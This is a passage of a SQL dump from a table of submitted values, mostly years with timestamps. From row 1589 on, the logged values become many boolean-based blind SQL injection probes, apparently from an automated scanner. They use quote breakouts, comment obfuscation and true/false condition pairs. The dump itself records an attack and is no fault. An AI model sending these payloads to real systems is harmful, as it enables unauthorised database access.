(1458, 1, 1, '2024', 0, '2024-03-15 07:35:23'),
(1459, 1, 1, '2023', 0, '2024-03-15 16:23:34'),
(1460, 1, 1, '2025', 0, '2024-03-16 17:19:56'),
(1461, 1, 1, '2024', 0, '2024-03-17 15:52:09'),
(1462, 1, 1, '2023', 0, '2024-03-17 19:35:15'),
(1463, 1, 1, '2024', 0, '2024-03-18 00:23:22'),
(1464, 1, 1, '2022', 3, '2024-03-20 01:45:35'),
(1465, 1, 1, '2024', 0, '2024-03-22 09:57:20'),
(1466, 1, 1, '2023', 0, '2024-03-26 23:36:25'),
(1467, 1, 1, '2023', 0, '2024-03-27 18:08:45'),
(1468, 1, 1, '2024', 0, '2024-03-28 01:33:19'),
(1469, 1, 1, '2025', 0, '2024-04-01 17:00:25'),
(1470, 1, 1, '2024', 0, '2024-04-01 21:33:32'),
(1471, 1, 1, '2023', 0, '2024-04-02 05:11:22'),
(1472, 1, 1, '2024', 0, '2024-04-02 14:57:42'),
(1473, 1, 1, '2023', 0, '2024-04-02 20:54:43'),
(1474, 1, 1, '2025', 0, '2024-04-02 22:08:04'),
(1475, 1, 1, '2024', 0, '2024-04-03 03:31:03'),
(1476, 1, 1, '2024', 0, '2024-04-04 21:42:25'),
(1477, 1, 1, '2023', 0, '2024-04-05 15:13:53'),
(1478, 1, 1, '2023', 0, '2024-04-05 15:13:54'),
(1479, 1, 1, '2024', 0, '2024-04-12 15:46:44'),
(1480, 1, 1, '2022', 1, '2024-04-12 23:59:58'),
(1481, 1, 1, '2025', 0, '2024-04-13 10:22:34'),
(1482, 1, 1, '2024', 0, '2024-04-13 17:25:40'),
(1483, 1, 1, '2025', 0, '2024-04-15 19:18:44'),
(1484, 1, 1, '2024', 0, '2024-04-16 01:07:03'),
(1485, 1, 1, '2025', 0, '2024-04-17 07:35:53'),
(1486, 1, 1, '2023', 0, '2024-04-18 00:17:35'),
(1487, 1, 1, '2025', 0, '2024-04-18 00:17:39'),
(1488, 1, 1, '2024', 0, '2024-04-18 00:50:56'),
(1489, 1, 1, '2022', 1, '2024-04-18 12:34:15'),
(1490, 1, 1, '2025', 0, '2024-04-18 23:12:35'),
(1491, 1, 1, '2023', 0, '2024-04-19 01:36:15'),
(1492, 1, 1, '2024', 0, '2024-04-19 11:19:41'),
(1493, 1, 1, '2025', 0, '2024-04-19 20:01:47'),
(1494, 1, 1, '2025', 0, '2024-04-20 05:35:45'),
(1495, 1, 1, '2025', 0, '2024-04-20 15:43:54'),
(1496, 1, 1, '2025', 0, '2024-04-22 10:45:26'),
(1497, 1, 1, '2024', 0, '2024-04-27 00:41:46'),
(1498, 1, 1, '2024', 0, '2024-04-28 19:16:34'),
(1499, 1, 1, '2024', 0, '2024-05-01 01:03:44'),
(1500, 1, 1, '2023', 0, '2024-05-01 12:36:13'),
(1501, 1, 1, '2025', 0, '2024-05-02 16:30:41'),
(1502, 1, 1, '2025', 0, '2024-05-11 15:59:55'),
(1503, 1, 1, '2023', 0, '2024-05-11 20:57:57'),
(1504, 1, 1, '2025', 0, '2024-05-11 21:23:51'),
(1505, 1, 1, '2025', 0, '2024-05-13 23:05:24'),
(1506, 1, 1, '2024', 0, '2024-05-15 07:31:24'),
(1507, 1, 1, '2025', 0, '2024-05-19 00:08:20'),
(1508, 1, 1, '2022', 1, '2024-05-19 03:25:39'),
(1509, 1, 1, '2025', 0, '2024-05-19 12:06:07'),
(1510, 1, 1, '2024', 0, '2024-05-19 12:38:42'),
(1511, 1, 1, '2022', 1, '2024-05-20 08:40:16'),
(1512, 1, 1, '2025', 0, '2024-05-24 23:39:30'),
(1513, 1, 1, '2023', 0, '2024-05-26 19:59:50'),
(1514, 1, 1, '2025', 0, '2024-05-26 21:18:26'),
(1515, 1, 1, '2023', 0, '2024-05-27 04:46:41'),
(1516, 1, 1, '2023', 0, '2024-05-27 06:14:21'),
(1517, 1, 1, '2025', 0, '2024-06-01 12:41:18'),
(1518, 1, 1, '2025', 0, '2024-06-03 16:55:21'),
(1519, 1, 1, '2022', 1, '2024-06-05 03:13:19'),
(1520, 1, 1, '2024', 0, '2024-06-11 21:17:41'),
(1521, 1, 1, '2023', 0, '2024-06-16 03:25:34'),
(1522, 1, 1, '2022', 1, '2024-06-16 10:11:50'),
(1523, 1, 1, '2024', 0, '2024-06-18 08:58:17'),
(1524, 1, 1, '2025', 0, '2024-06-19 08:36:10'),
(1525, 1, 1, '2025', 0, '2024-06-19 18:25:27'),
(1526, 1, 1, '2023', 0, '2024-06-22 05:59:11'),
(1527, 1, 1, '2025', 0, '2024-06-22 06:18:13'),
(1528, 1, 1, '2025', 0, '2024-06-22 20:42:17'),
(1529, 1, 1, '2025', 0, '2024-06-23 01:55:57'),
(1530, 1, 1, '2023', 0, '2024-06-26 13:15:15'),
(1531, 1, 1, '2025', 0, '2024-06-28 19:41:58'),
(1532, 1, 1, '2023', 0, '2024-06-28 23:29:19'),
(1533, 1, 1, '2024', 0, '2024-06-30 08:53:37'),
(1534, 1, 1, '2024', 0, '2024-07-01 10:55:06'),
(1535, 1, 1, '2024', 0, '2024-07-01 21:28:06'),
(1536, 1, 1, '2023', 0, '2024-07-04 01:30:47'),
(1537, 1, 1, '2025', 0, '2024-07-05 17:20:30'),
(1538, 1, 1, '2023', 0, '2024-07-05 23:41:59'),
(1539, 1, 1, '2023', 0, '2024-07-06 03:59:13'),
(1540, 1, 1, '2023', 0, '2024-07-06 22:07:23'),
(1541, 1, 1, '2023', 0, '2024-07-07 13:51:12'),
(1542, 1, 1, '2024', 0, '2024-07-08 02:01:36'),
(1543, 1, 1, '2025', 0, '2024-07-08 19:56:45'),
(1544, 1, 1, '2024', 0, '2024-07-10 12:14:22'),
(1545, 1, 1, '2025', 0, '2024-07-10 20:46:10'),
(1546, 1, 1, '2023', 0, '2024-07-11 15:49:01'),
(1547, 1, 1, '2023', 0, '2024-07-12 00:04:04'),
(1548, 1, 1, '2025', 0, '2024-07-12 09:13:54'),
(1549, 1, 1, '2025', 0, '2024-07-12 16:00:33'),
(1550, 1, 1, '2025', 0, '2024-07-15 07:50:29'),
(1551, 1, 1, '2024', 0, '2024-07-18 19:14:19'),
(1552, 1, 1, '2023', 0, '2024-07-19 07:16:22'),
(1553, 1, 1, '2024', 0, '2024-07-24 07:30:32'),
(1554, 1, 1, '2025', 0, '2024-07-25 09:38:27'),
(1555, 1, 1, '2025', 0, '2024-07-25 17:41:31'),
(1556, 1, 1, '2024', 0, '2024-07-26 06:24:29'),
(1557, 1, 1, '2023', 0, '2024-07-26 08:17:59'),
(1558, 1, 1, '2025', 0, '2024-07-26 21:32:55'),
(1559, 1, 1, '2023', 0, '2024-07-28 22:08:17'),
(1560, 1, 1, '2024', 0, '2024-07-29 17:02:49'),
(1561, 1, 1, '2025', 0, '2024-07-30 02:32:33'),
(1562, 1, 1, '2025', 0, '2024-07-31 13:55:14'),
(1563, 1, 1, '2025', 0, '2024-08-01 14:07:13'),
(1564, 1, 1, '2023', 0, '2024-08-05 18:03:36'),
(1565, 1, 1, '2025', 0, '2024-08-09 03:40:56'),
(1566, 1, 1, '2024', 0, '2024-08-09 03:40:56'),
(1567, 1, 1, '2025', 0, '2024-08-12 16:54:23'),
(1568, 1, 1, '2024', 0, '2024-08-14 23:51:49'),
(1569, 1, 1, '2024', 0, '2024-08-15 20:55:57'),
(1570, 1, 1, '2025', 0, '2024-08-16 09:21:03'),
(1571, 1, 1, '2024', 0, '2024-08-20 03:36:59'),
(1572, 1, 1, '2024', 0, '2024-09-16 17:05:19'),
(1573, 1, 1, '2025', 0, '2024-09-17 08:46:13'),
(1574, 1, 1, '2025', 0, '2024-09-18 07:28:08'),
(1575, 1, 1, '2024', 0, '2024-09-21 11:11:32'),
(1576, 1, 1, '2025', 0, '2024-09-23 17:17:39'),
(1577, 1, 1, '2025', 0, '2024-09-25 11:40:07'),
(1578, 1, 1, '2024', 0, '2024-09-28 02:42:41'),
(1579, 1, 1, '2024', 0, '2024-09-30 05:24:09'),
(1580, 1, 1, '2025', 0, '2024-09-30 06:09:05'),
(1581, 1, 1, '2024', 0, '2024-10-08 14:03:35'),
(1582, 1, 1, '2024', 0, '2024-10-14 00:38:18'),
(1583, 1, 1, '2024', 0, '2024-10-15 12:42:09'),
(1584, 1, 1, '2025', 0, '2024-10-17 19:54:25'),
(1585, 1, 1, '2025', 0, '2024-10-18 12:53:19'),
(1586, 1, 1, '2024', 0, '2024-10-18 18:48:22'),
(1587, 1, 1, '2025', 0, '2024-10-22 01:42:49'),
(1588, 1, 1, '2025', 0, '2024-10-24 00:28:01'),
(1589, 1, 1, 'Swul', 0, '2024-10-24 17:44:33'),
(1590, 1, 1, 'Swul', 0, '2024-10-24 17:44:37'),
(1591, 1, 1, 'Swul', 0, '2024-10-24 17:44:41'),
(1592, 1, 1, 'Swul', 0, '2024-10-24 17:44:43'),
(1593, 1, 1, 'Swul', 0, '2024-10-24 17:44:44'),
(1594, 1, 1, 'Swul', 0, '2024-10-24 17:44:46'),
(1595, 1, 1, 'Swul', 0, '2024-10-24 17:44:48'),
(1596, 1, 1, 'Swul', 0, '2024-10-24 17:44:50'),
(1597, 1, 1, 'Swul', 0, '2024-10-24 17:44:52'),
(1598, 1, 1, 'Swul', 0, '2024-10-24 17:44:53'),
(1599, 1, 1, 'Swul', 0, '2024-10-24 17:44:55'),
(1600, 1, 1, 'Swul', 0, '2024-10-24 17:44:57'),
(1601, 1, 1, 'Swul', 0, '2024-10-24 17:44:58'),
(1602, 1, 1, 'Swul', 0, '2024-10-24 17:45:00'),
(1603, 1, 1, 'Swul', 0, '2024-10-24 17:45:02'),
(1604, 1, 1, 'Swul', 0, '2024-10-24 17:45:04'),
(1605, 1, 1, 'Swul', 0, '2024-10-24 17:45:06'),
(1606, 1, 1, 'Swul', 0, '2024-10-24 17:45:08'),
(1607, 1, 1, 'Swul', 0, '2024-10-24 17:45:09'),
(1608, 1, 1, 'Swul', 0, '2024-10-24 17:45:12'),
(1609, 1, 1, 'Swul', 0, '2024-10-24 17:45:17'),
(1610, 1, 1, 'Swul', 0, '2024-10-24 17:45:18'),
(1611, 1, 1, 'Swul', 0, '2024-10-24 17:45:20'),
(1612, 1, 1, 'Swul', 0, '2024-10-24 17:45:21'),
(1613, 1, 1, 'Swul', 0, '2024-10-24 17:45:23'),
(1614, 1, 1, 'fJTD', 0, '2024-10-24 19:15:29'),
(1615, 1, 1, 'fJTD', 0, '2024-10-24 19:15:30'),
(1616, 1, 1, 'fJTD', 0, '2024-10-24 19:23:08'),
(1617, 1, 1, 'fJTD', 0, '2024-10-24 19:24:10'),
(1618, 1, 1, 'fJTD', 0, '2024-10-24 19:24:12'),
(1619, 1, 1, '9822', 0, '2024-10-24 19:24:13'),
(1620, 1, 1, '9822', 0, '2024-10-24 19:24:15'),
(1621, 1, 1, 'fJTD..((\')(.\".', 0, '2024-10-24 19:24:17'),
(1622, 1, 1, 'fJTD\'GxEFId', 0, '2024-10-24 19:24:19'),
(1623, 1, 1, 'fJTD', 0, '2024-10-24 19:24:21'),
(1624, 1, 1, 'fJTD\')/**/AND/**/1251=9868/**/AND/**/(\'FHmR\'=\'FHmR', 0, '2024-10-24 19:24:23'),
(1625, 1, 1, 'fJTD\')/**/AND/**/1251=9868/**/AND/**/(\'FHmR\'=\'FHmR', 0, '2024-10-24 19:24:25'),
(1626, 1, 1, 'fJTD\')/**/AND/**/1375=1375/**/AND/**/(\'uEKk\'=\'uEKk', 0, '2024-10-24 19:24:31'),
(1627, 1, 1, 'fJTD\')/**/AND/**/1375=1375/**/AND/**/(\'uEKk\'=\'uEKk', 0, '2024-10-24 19:24:33'),
(1628, 1, 1, 'fJTD\'))/**/AND/**/8492=5595/**/AND/**/((\'kqrK\'=\'kqrK', 0, '2024-10-24 19:24:35'),
(1629, 1, 1, 'fJTD\'))/**/AND/**/8492=5595/**/AND/**/((\'kqrK\'=\'kqrK', 0, '2024-10-24 19:24:37'),
(1630, 1, 1, 'fJTD\'))/**/AND/**/1375=1375/**/AND/**/((\'fHZF\'=\'fHZF', 0, '2024-10-24 19:24:39'),
(1631, 1, 1, 'fJTD\'))/**/AND/**/1375=1375/**/AND/**/((\'fHZF\'=\'fHZF', 0, '2024-10-24 19:24:41'),
(1632, 1, 1, 'fJTD\'/**/AND/**/1427=3299/**/AND/**/\'SIEb\'=\'SIEb', 0, '2024-10-24 19:24:43'),
(1633, 1, 1, 'fJTD\'/**/AND/**/1427=3299/**/AND/**/\'SIEb\'=\'SIEb', 0, '2024-10-24 19:24:45'),
(1634, 1, 1, 'fJTD\'/**/AND/**/1375=1375/**/AND/**/\'PIpJ\'=\'PIpJ', 0, '2024-10-24 19:24:47'),
(1635, 1, 1, 'fJTD\'/**/AND/**/1375=1375/**/AND/**/\'PIpJ\'=\'PIpJ', 0, '2024-10-24 19:24:48'),
(1636, 1, 1, 'fJTD\')/**/AND/**/8686=2489/**/AND/**/(\'nvsY\'/**/LIKE/**/\'nvsY', 0, '2024-10-24 19:24:50'),
(1637, 1, 1, 'fJTD\')/**/AND/**/8686=2489/**/AND/**/(\'nvsY\'/**/LIKE/**/\'nvsY', 0, '2024-10-24 19:24:52'),
(1638, 1, 1, 'fJTD\')/**/AND/**/1375=1375/**/AND/**/(\'BewQ\'/**/LIKE/**/\'BewQ', 0, '2024-10-24 19:24:53'),
(1639, 1, 1, 'fJTD\')/**/AND/**/1375=1375/**/AND/**/(\'BewQ\'/**/LIKE/**/\'BewQ', 0, '2024-10-24 19:24:55'),
(1640, 1, 1, 'fJTD%\'/**/AND/**/7053=3805/**/AND/**/\'Jzpb%\'=\'Jzpb', 0, '2024-10-24 19:24:57'),
(1641, 1, 1, 'fJTD%\'/**/AND/**/7053=3805/**/AND/**/\'Jzpb%\'=\'Jzpb', 0, '2024-10-24 19:24:59'),
(1642, 1, 1, 'fJTD%\'/**/AND/**/1375=1375/**/AND/**/\'kAuc%\'=\'kAuc', 0, '2024-10-24 19:25:01'),
(1643, 1, 1, 'fJTD%\'/**/AND/**/1375=1375/**/AND/**/\'kAuc%\'=\'kAuc', 0, '2024-10-24 19:25:02'),
(1644, 1, 1, 'fJTD\'/**/AND/**/8822=3513/**/AND/**/\'uYPG\'/**/LIKE/**/\'uYPG', 0, '2024-10-24 19:25:05'),
(1645, 1, 1, 'fJTD\'/**/AND/**/8822=3513/**/AND/**/\'uYPG\'/**/LIKE/**/\'uYPG', 0, '2024-10-24 19:25:06'),
(1646, 1, 1, 'fJTD\'/**/AND/**/1375=1375/**/AND/**/\'OcdE\'/**/LIKE/**/\'OcdE', 0, '2024-10-24 19:25:08'),
(1647, 1, 1, 'fJTD\'/**/AND/**/1375=1375/**/AND/**/\'OcdE\'/**/LIKE/**/\'OcdE', 0, '2024-10-24 19:25:10'),
(1648, 1, 1, 'fJTD\")/**/AND/**/2914=9116/**/AND/**/(\"WXZO\"=\"WXZO', 0, '2024-10-24 19:25:11'),
(1649, 1, 1, 'fJTD\")/**/AND/**/2914=9116/**/AND/**/(\"WXZO\"=\"WXZO', 0, '2024-10-24 19:25:13'),
(1650, 1, 1, 'fJTD\")/**/AND/**/1375=1375/**/AND/**/(\"UKmK\"=\"UKmK', 0, '2024-10-24 19:25:15'),
(1651, 1, 1, 'fJTD\")/**/AND/**/1375=1375/**/AND/**/(\"UKmK\"=\"UKmK', 0, '2024-10-24 19:25:17'),
(1652, 1, 1, 'fJTD\"/**/AND/**/5747=3253/**/AND/**/\"Ylcj\"=\"Ylcj', 0, '2024-10-24 19:25:18'),
(1653, 1, 1, 'fJTD\"/**/AND/**/5747=3253/**/AND/**/\"Ylcj\"=\"Ylcj', 0, '2024-10-24 19:25:20'),
(1654, 1, 1, 'fJTD\"/**/AND/**/1375=1375/**/AND/**/\"AUkE\"=\"AUkE', 0, '2024-10-24 19:25:22'),
(1655, 1, 1, 'fJTD\"/**/AND/**/1375=1375/**/AND/**/\"AUkE\"=\"AUkE', 0, '2024-10-24 19:25:24'),
(1656, 1, 1, 'fJTD)/**/AND/**/1646=9674/**/AND/**/(4105/**/BETWEEN/**/4105/**/AND/**/4105', 0, '2024-10-24 19:25:26'),
(1657, 1, 1, 'fJTD)/**/AND/**/1646=9674/**/AND/**/(4105/**/BETWEEN/**/4105/**/AND/**/4105', 0, '2024-10-24 19:25:31'),
(1658, 1, 1, 'fJTD)/**/AND/**/1375=1375/**/AND/**/(8613/**/BETWEEN/**/8613/**/AND/**/8613', 0, '2024-10-24 19:25:33'),
(1659, 1, 1, 'fJTD)/**/AND/**/1375=1375/**/AND/**/(8613/**/BETWEEN/**/8613/**/AND/**/8613', 0, '2024-10-24 19:25:35'),
(1660, 1, 1, 'fJTD))/**/AND/**/6906=9028/**/AND/**/((7904/**/BETWEEN/**/7904/**/AND/**/7904', 0, '2024-10-24 19:25:37'),
(1661, 1, 1, 'fJTD))/**/AND/**/6906=9028/**/AND/**/((7904/**/BETWEEN/**/7904/**/AND/**/7904', 0, '2024-10-24 19:25:38'),
(1662, 1, 1, 'fJTD))/**/AND/**/1375=1375/**/AND/**/((1446/**/BETWEEN/**/1446/**/AND/**/1446', 0, '2024-10-24 19:25:40'),
(1663, 1, 1, 'fJTD))/**/AND/**/1375=1375/**/AND/**/((1446/**/BETWEEN/**/1446/**/AND/**/1446', 0, '2024-10-24 19:25:42'),
(1664, 1, 1, 'fJTD/**/AND/**/7218/**/BETWEEN/**/5674/**/AND/**/5674', 0, '2024-10-24 19:25:44'),
(1665, 1, 1, 'fJTD/**/AND/**/7218/**/BETWEEN/**/5674/**/AND/**/5674', 0, '2024-10-24 19:25:46'),
(1666, 1, 1, 'fJTD/**/AND/**/1375/**/BETWEEN/**/1375/**/AND/**/1375', 0, '2024-10-24 19:25:48'),
(1667, 1, 1, 'fJTD/**/AND/**/1375/**/BETWEEN/**/1375/**/AND/**/1375', 0, '2024-10-24 19:25:49'),
(1668, 1, 1, 'fJTD/**/AND/**/7051/**/BETWEEN/**/2232/**/AND/**/2232--/**/OGtg', 0, '2024-10-24 19:25:51'),
(1669, 1, 1, 'fJTD/**/AND/**/7051/**/BETWEEN/**/2232/**/AND/**/2232--/**/OGtg', 0, '2024-10-24 19:25:52'),
(1670, 1, 1, 'fJTD/**/AND/**/1375/**/BETWEEN/**/1375/**/AND/**/1375--/**/LNpV', 0, '2024-10-24 19:25:54'),
(1671, 1, 1, 'fJTD/**/AND/**/1375/**/BETWEEN/**/1375/**/AND/**/1375--/**/LNpV', 0, '2024-10-24 19:25:56'),
(1672, 1, 1, '-6484', 0, '2024-10-24 19:25:58'),
(1673, 1, 1, '-4408\')/**/OR/**/1880=7926/**/AND/**/(\'vJJI\'=\'vJJI', 0, '2024-10-24 19:26:00'),
(1674, 1, 1, '-4408\')/**/OR/**/1880=7926/**/AND/**/(\'vJJI\'=\'vJJI', 0, '2024-10-24 19:26:01'),
(1675, 1, 1, '-7776\')/**/OR/**/3023=3023/**/AND/**/(\'WrDQ\'=\'WrDQ', 0, '2024-10-24 19:26:04'),
(1676, 1, 1, '-7776\')/**/OR/**/3023=3023/**/AND/**/(\'WrDQ\'=\'WrDQ', 0, '2024-10-24 19:26:05'),
(1677, 1, 1, '-2955\')/**/OR/**/4406=2049/**/AND/**/(\'CheA\'=\'CheA', 0, '2024-10-24 19:26:07'),
(1678, 1, 1, '-2955\')/**/OR/**/4406=2049/**/AND/**/(\'CheA\'=\'CheA', 0, '2024-10-24 19:26:09'),
(1679, 1, 1, '-3180\'))/**/OR/**/9469=4292/**/AND/**/((\'rMFq\'=\'rMFq', 0, '2024-10-24 19:26:11'),
(1680, 1, 1, '-3180\'))/**/OR/**/9469=4292/**/AND/**/((\'rMFq\'=\'rMFq', 0, '2024-10-24 19:26:12'),
(1681, 1, 1, '-4359\'))/**/OR/**/3023=3023/**/AND/**/((\'rUNm\'=\'rUNm', 0, '2024-10-24 19:26:14'),
(1682, 1, 1, '-4359\'))/**/OR/**/3023=3023/**/AND/**/((\'rUNm\'=\'rUNm', 0, '2024-10-24 19:26:16'),
(1683, 1, 1, '-7514\'))/**/OR/**/5095=1899/**/AND/**/((\'cglh\'=\'cglh', 0, '2024-10-24 19:26:18'),
(1684, 1, 1, '-7514\'))/**/OR/**/5095=1899/**/AND/**/((\'cglh\'=\'cglh', 0, '2024-10-24 19:26:19'),
(1685, 1, 1, '-8633\'/**/OR/**/3075=1650/**/AND/**/\'gMGA\'=\'gMGA', 0, '2024-10-24 19:26:21'),
(1686, 1, 1, '-8633\'/**/OR/**/3075=1650/**/AND/**/\'gMGA\'=\'gMGA', 0, '2024-10-24 19:26:23'),
(1687, 1, 1, '-8950\'/**/OR/**/3023=3023/**/AND/**/\'qdCF\'=\'qdCF', 0, '2024-10-24 19:26:25'),
(1688, 1, 1, '-8950\'/**/OR/**/3023=3023/**/AND/**/\'qdCF\'=\'qdCF', 0, '2024-10-24 19:26:27'),
(1689, 1, 1, '-1990\'/**/OR/**/1570=6144/**/AND/**/\'LUva\'=\'LUva', 0, '2024-10-24 19:26:28'),
(1690, 1, 1, '-1990\'/**/OR/**/1570=6144/**/AND/**/\'LUva\'=\'LUva', 0, '2024-10-24 19:26:30'),
(1691, 1, 1, '-2659\')/**/OR/**/2916=5654/**/AND/**/(\'eyzj\'/**/LIKE/**/\'eyzj', 0, '2024-10-24 19:26:32'),
(1692, 1, 1, '-2659\')/**/OR/**/2916=5654/**/AND/**/(\'eyzj\'/**/LIKE/**/\'eyzj', 0, '2024-10-24 19:26:33'),
(1693, 1, 1, '-7045\')/**/OR/**/3023=3023/**/AND/**/(\'wkmM\'/**/LIKE/**/\'wkmM', 0, '2024-10-24 19:26:35'),
(1694, 1, 1, '-7045\')/**/OR/**/3023=3023/**/AND/**/(\'wkmM\'/**/LIKE/**/\'wkmM', 0, '2024-10-24 19:26:38'),
(1695, 1, 1, '-7336\')/**/OR/**/5493=9674/**/AND/**/(\'qZqP\'/**/LIKE/**/\'qZqP', 0, '2024-10-24 19:26:40'),
(1696, 1, 1, '-7336\')/**/OR/**/5493=9674/**/AND/**/(\'qZqP\'/**/LIKE/**/\'qZqP', 0, '2024-10-24 19:26:41'),
(1697, 1, 1, '-7056%\'/**/OR/**/3507=8344/**/AND/**/\'OIBm%\'=\'OIBm', 0, '2024-10-24 19:26:43'),
(1698, 1, 1, '-7056%\'/**/OR/**/3507=8344/**/AND/**/\'OIBm%\'=\'OIBm', 0, '2024-10-24 19:26:45'),
(1699, 1, 1, '-1991%\'/**/OR/**/3023=3023/**/AND/**/\'twwh%\'=\'twwh', 0, '2024-10-24 19:26:47'),
(1700, 1, 1, '-1991%\'/**/OR/**/3023=3023/**/AND/**/\'twwh%\'=\'twwh', 0, '2024-10-24 19:26:48'),
(1701, 1, 1, '-4156%\'/**/OR/**/9562=7823/**/AND/**/\'xKWt%\'=\'xKWt', 0, '2024-10-24 19:26:50'),
(1702, 1, 1, '-4156%\'/**/OR/**/9562=7823/**/AND/**/\'xKWt%\'=\'xKWt', 0, '2024-10-24 19:26:52'),
(1703, 1, 1, '-4006\'/**/OR/**/9456=3793/**/AND/**/\'gLYd\'/**/LIKE/**/\'gLYd', 0, '2024-10-24 19:26:54'),
(1704, 1, 1, '-4006\'/**/OR/**/9456=3793/**/AND/**/\'gLYd\'/**/LIKE/**/\'gLYd', 0, '2024-10-24 19:26:56'),
(1705, 1, 1, '-3530\'/**/OR/**/3023=3023/**/AND/**/\'Ffvf\'/**/LIKE/**/\'Ffvf', 0, '2024-10-24 19:26:57'),
(1706, 1, 1, '-3530\'/**/OR/**/3023=3023/**/AND/**/\'Ffvf\'/**/LIKE/**/\'Ffvf', 0, '2024-10-24 19:27:04'),
(1707, 1, 1, '-9216\'/**/OR/**/2945=6690/**/AND/**/\'UogE\'/**/LIKE/**/\'UogE', 0, '2024-10-24 19:27:06'),
(1708, 1, 1, '-9216\'/**/OR/**/2945=6690/**/AND/**/\'UogE\'/**/LIKE/**/\'UogE', 0, '2024-10-24 19:27:08'),
(1709, 1, 1, '-1164\")/**/OR/**/6752=5496/**/AND/**/(\"tpzS\"=\"tpzS', 0, '2024-10-24 19:27:09'),
(1710, 1, 1, '-1164\")/**/OR/**/6752=5496/**/AND/**/(\"tpzS\"=\"tpzS', 0, '2024-10-24 19:27:11'),
(1711, 1, 1, '-8840\")/**/OR/**/3023=3023/**/AND/**/(\"ITcv\"=\"ITcv', 0, '2024-10-24 19:27:13'),
(1712, 1, 1, '-8840\")/**/OR/**/3023=3023/**/AND/**/(\"ITcv\"=\"ITcv', 0, '2024-10-24 19:27:14'),
(1713, 1, 1, '-9326\")/**/OR/**/1117=5196/**/AND/**/(\"iJMo\"=\"iJMo', 0, '2024-10-24 19:27:16'),
(1714, 1, 1, '-9326\")/**/OR/**/1117=5196/**/AND/**/(\"iJMo\"=\"iJMo', 0, '2024-10-24 19:27:18'),
(1715, 1, 1, '-8710\"/**/OR/**/1693=4461/**/AND/**/\"IlIb\"=\"IlIb', 0, '2024-10-24 19:27:20'),
(1716, 1, 1, '-8710\"/**/OR/**/1693=4461/**/AND/**/\"IlIb\"=\"IlIb', 0, '2024-10-24 19:27:22'),
(1717, 1, 1, '-7682\"/**/OR/**/3023=3023/**/AND/**/\"tUAt\"=\"tUAt', 0, '2024-10-24 19:27:24'),
(1718, 1, 1, '-7682\"/**/OR/**/3023=3023/**/AND/**/\"tUAt\"=\"tUAt', 0, '2024-10-24 19:27:25'),
(1719, 1, 1, '-3221\"/**/OR/**/3631=8856/**/AND/**/\"TdGg\"=\"TdGg', 0, '2024-10-24 19:27:27'),
(1720, 1, 1, '-3221\"/**/OR/**/3631=8856/**/AND/**/\"TdGg\"=\"TdGg', 0, '2024-10-24 19:27:29'),
(1721, 1, 1, '-4221)/**/OR/**/3800=8686/**/AND/**/(5201/**/BETWEEN/**/5201/**/AND/**/5201', 0, '2024-10-24 19:27:31'),
(1722, 1, 1, '-4221)/**/OR/**/3800=8686/**/AND/**/(5201/**/BETWEEN/**/5201/**/AND/**/5201', 0, '2024-10-24 19:27:32'),
(1723, 1, 1, '-4397)/**/OR/**/3023=3023/**/AND/**/(1180/**/BETWEEN/**/1180/**/AND/**/1180', 0, '2024-10-24 19:27:34'),
(1724, 1, 1, '-4397)/**/OR/**/3023=3023/**/AND/**/(1180/**/BETWEEN/**/1180/**/AND/**/1180', 0, '2024-10-24 19:27:36'),
(1725, 1, 1, '-2064)/**/OR/**/1888=8959/**/AND/**/(2339/**/BETWEEN/**/2339/**/AND/**/2339', 0, '2024-10-24 19:27:38'),
(1726, 1, 1, '-2064)/**/OR/**/1888=8959/**/AND/**/(2339/**/BETWEEN/**/2339/**/AND/**/2339', 0, '2024-10-24 19:27:39'),
(1727, 1, 1, '-3335))/**/OR/**/2970=3515/**/AND/**/((2801/**/BETWEEN/**/2801/**/AND/**/2801', 0, '2024-10-24 19:27:41'),
(1728, 1, 1, '-3335))/**/OR/**/2970=3515/**/AND/**/((2801/**/BETWEEN/**/2801/**/AND/**/2801', 0, '2024-10-24 19:27:43'),
(1729, 1, 1, '-4321))/**/OR/**/3023=3023/**/AND/**/((1253/**/BETWEEN/**/1253/**/AND/**/1253', 0, '2024-10-24 19:27:45'),
(1730, 1, 1, '-4321))/**/OR/**/3023=3023/**/AND/**/((1253/**/BETWEEN/**/1253/**/AND/**/1253', 0, '2024-10-24 19:27:46'),
(1731, 1, 1, '-6528))/**/OR/**/4544=6006/**/AND/**/((6479/**/BETWEEN/**/6479/**/AND/**/6479', 0, '2024-10-24 19:27:48'),
(1732, 1, 1, '-6528))/**/OR/**/4544=6006/**/AND/**/((6479/**/BETWEEN/**/6479/**/AND/**/6479', 0, '2024-10-24 19:27:49'),
(1733, 1, 1, '-3585/**/OR/**/7434/**/BETWEEN/**/6186/**/AND/**/6186', 0, '2024-10-24 19:27:51'),
(1734, 1, 1, '-3585/**/OR/**/7434/**/BETWEEN/**/6186/**/AND/**/6186', 0, '2024-10-24 19:27:52'),
(1735, 1, 1, '-6954/**/OR/**/3023/**/BETWEEN/**/3023/**/AND/**/3023', 0, '2024-10-24 19:27:54'),
(1736, 1, 1, '-6954/**/OR/**/3023/**/BETWEEN/**/3023/**/AND/**/3023', 0, '2024-10-24 19:27:56'),
(1737, 1, 1, '-5366/**/OR/**/1371/**/BETWEEN/**/4064/**/AND/**/4064', 0, '2024-10-24 19:27:58'),
(1738, 1, 1, '-5366/**/OR/**/1371/**/BETWEEN/**/4064/**/AND/**/4064', 0, '2024-10-24 19:27:59'),
(1739, 1, 1, '-7382/**/OR/**/3837/**/BETWEEN/**/6108/**/AND/**/6108--/**/PkVk', 0, '2024-10-24 19:28:03'),
(1740, 1, 1, '-7382/**/OR/**/3837/**/BETWEEN/**/6108/**/AND/**/6108--/**/PkVk', 0, '2024-10-24 19:28:05'),
(1741, 1, 1, '-2560/**/OR/**/3023/**/BETWEEN/**/3023/**/AND/**/3023--/**/sqgX', 0, '2024-10-24 19:28:07'),
(1742, 1, 1, '-2560/**/OR/**/3023/**/BETWEEN/**/3023/**/AND/**/3023--/**/sqgX', 0, '2024-10-24 19:28:08'),
(1743, 1, 1, '-2180/**/OR/**/3459/**/BETWEEN/**/8523/**/AND/**/8523--/**/pbcf', 0, '2024-10-24 19:28:10'),
(1744, 1, 1, '-2180/**/OR/**/3459/**/BETWEEN/**/8523/**/AND/**/8523--/**/pbcf', 0, '2024-10-24 19:28:12'),
(1745, 1, 1, 'fJTD\')/**/AND/**/7147/**/BETWEEN/**/2611/**/AND/**/2611--/**/jXmO', 0, '2024-10-24 19:29:09'),
(1746, 1, 1, 'fJTD\')/**/AND/**/7147/**/BETWEEN/**/2611/**/AND/**/2611--/**/jXmO', 0, '2024-10-24 19:29:09'),
